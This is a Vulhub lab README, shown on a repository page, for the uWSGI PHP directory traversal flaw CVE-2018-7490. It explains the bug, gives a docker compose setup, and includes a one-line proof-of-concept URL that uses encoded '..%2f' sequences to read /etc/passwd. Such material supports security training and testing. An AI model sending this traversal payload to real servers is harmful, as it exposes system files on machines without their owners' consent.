aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/uwsgi/CVE-2018-7490/README.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

25 lines
763 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# uWSGI PHP Directory Traversal Vulnerability (CVE-2018-7490)
[中文版本(Chinese version)](README.zh-cn.md)
uWSGI is a web application server, which implements protocols such as WSGI/uwsgi/http, and supports for various languages through plugins.
The PHP plugin of uWSGI before 2.0.17 doesn't handle the detection of `DOCUMENT_ROOT` correctly, resulting in reading or running files outside the `DOCUMENT_ROOT` through the use of `..%2f`.
## Environment Setup
Enter the following command
```
docker compose up -d
```
Visit `http://your-ip:8080` and you'll see the phpinfo page as the uwsgi-php server running successfully.
## POC
Directly visit `http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`, you will get the passwd file
![](1.png)
Reference in New Issue View Git Blame Copy Permalink